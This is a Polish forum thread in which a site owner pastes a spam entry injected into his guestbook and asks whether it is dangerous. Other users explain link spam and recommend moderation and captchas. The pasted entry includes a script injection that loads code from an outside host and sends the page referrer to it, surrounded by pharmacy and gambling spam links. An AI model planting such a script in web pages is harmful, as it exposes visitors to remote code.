Wpis do księgi gości

[_tomek76_]

Witam
dziś ktoś wpisał trzykrotnie do księgi gości na mojej stronie taki kod:

gkl3n8u-mlm1zf5-tw6q6ff6-0 <script>var r = document.referrer;
document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>
http://www.designcommunity.com/cgi-b.../cialis.html#1 <br /><a
href="http://www.designcommunity.com/cgi-bin/mlk?http://www.pillswithoutprescription.com/bontril_sr.html#2">bontril</a>
<br />blackjack online <br
/>http://www.designcommunity.com/cgi-b...sandaces.com#4 <br
/>[http://www.designcommunity.com/cgi-b...sandaces.com#5 blackjack] <br
/>"bontril":http://www.designcommunity.com/cgi-b...tril_sr.html#6 <br
/>[LINK http://www.FREE-SLOTS.TK#7]free slots[/LINK]



Dodam że wpisy były dokonywane co ok. 12 min i za każdym razem z innym numerem IP.

I mam pytania:
Co to za wpis?
jakie ma zadanie?
Czy to niebezpieczne?

Na stronie mam ustawione że jak ktoś wpisze wpis do księgi gości czy skomentuje newsa albo cokolwiek to jest wysyłany do mnie email z treścią wpisu datą, godziną i numerem IP wpisującego i teraz znowu pytanie czy cokolwiek może mi ktoś zrobić jak te wpisy są przesyłane do mnie na email a ja dopiero ręcznie dodaje je do kodu strony?

Czy ma to za zadanie przechwycenie hasła i loginu (mam możliwość dodawania newsów przez stronę www i czasami tak robię).
Czy jest jakiś dobry program który pokaże mi chociaż z jakiej sieci ktoś to zrobił jak mam jego IP cokolwiek jakąkolwiek lokalizację.
Dziękuję za wszelką pomoc.

[kosiarz]

roboty atakują, poczytaj w necie jest sporo sposobów żeby sie przed tym uchronić.

[TQM]

To najprostszy spam... po prostu ustawic aby bez zatwierdzenia admina nie bylo publikowane i cierpliwie usuwac poczte ze skrzynki Nie martw sie, nie jestes sam w tej materii.

[Nikow]

Walnij captche i po krzyku Skuteczność 99,9%

[_tomek76_]

Dzięki serdecznie uspokoiliście mnie.
mam właśnie tak ustawione że treśćprzychodzi do mnie w mailu
A czy takie wpisy jeżeli dostaną się na stronę to programy antywirusowe mogą pokazywać że jest na stronie wirus?
Mój poprzednik (pracownik odpowiedzialny za stronę) też dostawał takie wpisy ale były one umieszczane na stronie automatycznie) i programy antywirusowe pokazywały przy wejściu na stronę księgi gości obecność wirusa.
Po pewnym czasie okazało się że wszystkie newsy napisane przez niego zostały skasowane (newsy dodaje się przez wpisanie loginu i hasła na stronie www) Ktoś przejął jego hasło i wykasował wszystkie newsy jakich był właścicielem.

Czy mają związek takie wpisy do księgi gości z przejęciem loginu i hasła wpisywanego na stronie www?

Dzięki

[TQM]

Absolutnie nie ma to nic wspolnego z haslem... Zobacz - prowadzisz strone, pozwalasz na komentowanie newsow - musisz sie liczyc z tym, ze niektore beda nieodpowiednie, itd...

Co gorsze, jest wiele automatow, ktore wchodza na strony WWW, szukaja forow, ksieg gosci, artykulow ktore mozna komentowac, itd i wrzucaja tam swoj spam - reklamy tabletek na potencje, reklamy stron z panienkami, reklamy czegokolwiek... a czasami zamieszczaja niebezpieczne skrypty na stronie (wtedy antywirus ma prawo sie zbuntowac i powiedziec ze otwierasz cos niebezpiecznego, nawet jesli to Twoja wlasna strona).


Pytanie zasadnicze - po co to wszystko? Po to aby pozycjonowac swoja strone w wyszukiwarkach Im wiecej stron ma link do Twojej tym wyzej strona idzie do gory. Taki spam to idealny sposob napedzania sobie linkow - puszczasz robota, on leci i dopisuje Twoja strone - za darmo, bez wiedzy usera, bardzo czesto publikacja jest natychmiastowa (wpis w ksiedze gosci, itd).

Jak blokowac - moderacja komentarzy, captcha (obrazek do przepisania), oraz sporo cierpliwosci. Przede wszystkim nie zezwalac na automatyczna publikacje - co wchodzi z zewnatrz musi byc zatwierdzane przez czlowieka, niezaleznie od tego jakie sposoby zabezpieczenia sie przed spamem stosujesz.

Realia?
Pod tym postem w moim podpisie jest link do mojego blogu. Maly blog pol na pol polsko-angielski... Dziennie mam na serwerze nieco ponad 1000 wejsc z czego tak na prawde niecale 10% to ludzie, reszta to roboty (to da sie rozpoznac z ogromna dokladnoscia). Z tych powiedzmy 900 wizyt robotow dziennie mam okolo 10-20 komentarzy zawierajacych spam i to KAZDEGO DNIA! Co najciekawsze - wszystkie komentarze przychodza do artykulu napisanego w jezyku polskim, ktorego zasieg ze tak powiem w jakim artykul jest znany ogranicza sie do ludzi znajacych jezyk polski, podczas gdy artykuly anglojezyczne sa przeznaczone generalnie dla 'reszty swiata'. Dlaczego akurat ten URL dostaje tyle spamu?! Nie wiem... to tez dosc proste ale juz nie na ta wypowiedz.

[31337]

To najprostszy spam... po prostu ustawic aby bez zatwierdzenia admina nie bylo publikowane

No bez przesady...

Najlepiej przepisywany token, generowany na podstawie ip, daty, rand() i innych czynników =)

[TQM]

Hehe... milo mi ze ktos czyta to co pisze

Dzisiaj po opublikowaniu mojej odpowiedzi powyzej, mialem 9 specyficznych wpisow w logu... a dokladnie prob 'wstawienia' wlasnych wpisow na blogu przechodzac od prostych belkotlowych wpisow konczac na probie XSS i SQL injection.

Fajnie czyta sie pozniej logi z tego co sie dzialo... mozna sie z nich wiele nauczyc - zwlaszcza majac kilkadziesiat do kilkuset wpisow z roznych miejsc i o roznej tresci. Jakby ktos kiedys pytal czym sie zajmuje jak nie pracuje, to juz wieceie - czytam logi :P